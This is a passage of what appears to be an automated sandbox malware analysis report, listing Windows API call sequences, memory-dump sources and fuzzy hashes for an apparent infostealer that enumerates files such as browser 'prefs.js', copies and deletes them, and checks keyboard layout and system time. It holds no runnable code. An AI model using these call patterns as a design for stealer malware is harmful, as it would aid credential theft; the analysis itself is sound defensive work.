                    • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                    • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: 30246f1004ec411d292ebd34bd79ad3755d048ed616028282090bc1055ed864b
                    • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                    • Opcode Fuzzy Hash: 30246f1004ec411d292ebd34bd79ad3755d048ed616028282090bc1055ed864b
                    • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                    • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: 4@$\*.*
                    • API String ID: 2325840235-1993203227
                    • Opcode ID: 50afc4e36d77e581407f3191a6a3500e24fa763b594c381bdeb7cacfe856dda6
                    • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                    • Opcode Fuzzy Hash: 50afc4e36d77e581407f3191a6a3500e24fa763b594c381bdeb7cacfe856dda6
                    • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                    • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: 10403bee3d1061313c64fe9f4d720eb9e0ce2a9776297448fff9497b866f2e39
                    • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                    • Opcode Fuzzy Hash: 10403bee3d1061313c64fe9f4d720eb9e0ce2a9776297448fff9497b866f2e39
                    • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
                    • StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
                    • StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                    • FindClose.KERNEL32(000000FF), ref: 00401E32
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: 9c6aaf26391f4c563266a8cc5a8ee762c18988f76758305471b50301855c95f9
                    • Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
                    • Opcode Fuzzy Hash: 9c6aaf26391f4c563266a8cc5a8ee762c18988f76758305471b50301855c95f9
                    • Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                    APIs
                    • wsprintfA.USER32 ref: 040AEFA5
                    • FindFirstFileA.KERNEL32(?,?), ref: 040AEFBC
                    • StrCmpCA.SHLWAPI(?,00421538), ref: 040AF012
                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 040AF028
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040AF515
                    • FindClose.KERNEL32(000000FF), ref: 040AF52A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID:
                    • API String ID: 180737720-0
                    • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                    • Instruction ID: 9b858bbe22bc2735ce53fd322bc0f327d61c800a3e4ed5c2cdc69d6abb6591d1
                    • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                    • Instruction Fuzzy Hash: F0E12272A112189AEB68FB64DD50EEE7339AF54208F4041D9B18A72091EF347FC9CF95
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 040ADD52
                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 040ADD9A
                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 040ADDB0
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040AE033
                    • FindClose.KERNEL32(000000FF), ref: 040AE045
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                    • Instruction ID: ce0c4019c1cdea9c8d7122a511e8840f782698eedd4be9e807e57a866fd860b6
                    • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                    • Instruction Fuzzy Hash: 97918572A002049BDB14FBB4DD55DEE7379AF95308F00465CA48AB6544EF38BB188FE5
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                    • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 20d38ecc57deb3d9438d43c255bd77c074e8988a0e7323bbf35c3da253216f35
                    • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                    • Opcode Fuzzy Hash: 20d38ecc57deb3d9438d43c255bd77c074e8988a0e7323bbf35c3da253216f35
                    • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 040AF985
                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 040AF9D6
                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 040AF9EC
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040AFD18
                    • FindClose.KERNEL32(000000FF), ref: 040AFD2A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                    • Instruction ID: 8933b7e1816340df3d6d196d0a675468ba389537a904095552b0bf0aa01b6acf
                    • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                    • Instruction Fuzzy Hash: DEB16171A102189BDB24FFA4DD94EEE7379AF94308F0081A9D48AA6150EF347B49CFD5
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*$@
                    • API String ID: 433455689-2355794846
                    • Opcode ID: 8f144413de28821d8ed2cdbfb72baf9137ae42be297c9f4de77e82f8f978c612
                    • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                    • Opcode Fuzzy Hash: 8f144413de28821d8ed2cdbfb72baf9137ae42be297c9f4de77e82f8f978c612
                    • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 040A1B8A
                    • StrCmpCA.SHLWAPI(?,00425264), ref: 040A1BDA
                    • StrCmpCA.SHLWAPI(?,0042530C), ref: 040A1BF0
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040A1FA7
                    • DeleteFileA.KERNEL32(00000000), ref: 040A2031
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040A2087
                    • FindClose.KERNEL32(000000FF), ref: 040A2099
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID:
                    • API String ID: 1415058207-0
                    • Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                    • Instruction ID: 8a3f358e0cfe917dc803978de925ca6459220da8619555a9fc4783fda7f20b27
                    • Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                    • Instruction Fuzzy Hash: 26120C71A10218ABDB29FB64CD94EEE7379AF5430CF444199A14A76090EF747F88CFA4
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 040AE0C5
                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 040AE115
                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 040AE12B
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040AE647
                    • FindClose.KERNEL32(000000FF), ref: 040AE659
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID:
                    • API String ID: 2325840235-0
                    • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                    • Instruction ID: 2d8cbb76edf5636da9ecf522109a05480716f5a0a3bf4558514d462ad855bbcd
                    • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                    • Instruction Fuzzy Hash: 93F1E171A102189ADB29FB64DD94EEE7379AF5430CF4441DAA09A72091EF347F88CF94
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                    • LocalFree.KERNEL32(00000000), ref: 00417D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: f793b8f56b8d187460904af65bf855dbf7dc4249980a78512ab563ebf14e2e71
                    • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                    • Opcode Fuzzy Hash: f793b8f56b8d187460904af65bf855dbf7dc4249980a78512ab563ebf14e2e71
                    • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                    APIs
                    • memset.MSVCRT ref: 040ACABA
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 040ACAD8
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 040ACAE3
                    • memcpy.MSVCRT(?,?,?), ref: 040ACB79
                    • lstrcat.KERNEL32(?,00420B46), ref: 040ACBAA
                    • lstrcat.KERNEL32(?,00420B47), ref: 040ACBBE
                    • lstrcat.KERNEL32(?,00420B4E), ref: 040ACBDF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                    • String ID:
                    • API String ID: 1498829745-0
                    • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                    • Instruction ID: e037ae8f69bed60fd82e7d80fee07e79f4c158e6b807807b161f06d6cb35b8fe
                    • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                    • Instruction Fuzzy Hash: 3A418278944219EFDB10DFD0DC88BEEBBB9BB44304F1045A8E509A6280D7756B84CF91
                    APIs
                    • memset.MSVCRT ref: 0040C853
                    • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,024E92A0), ref: 0040C871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                    • memcpy.MSVCRT(?,?,?), ref: 0040C912
                    • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                    • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                    • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                    • String ID:
                    • API String ID: 1498829745-0
                    • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                    • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                    • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                    • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                    APIs
                    • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,024B6258,?,0042110C,?,00000000,?), ref: 0041696C
                    • sscanf.NTDLL ref: 00416999
                    • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,024B6258,?,0042110C), ref: 004169B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,024B6258,?,0042110C), ref: 004169C0
                    • ExitProcess.KERNEL32 ref: 004169DA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID: B
                    • API String ID: 2533653975-2248957098
                    • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
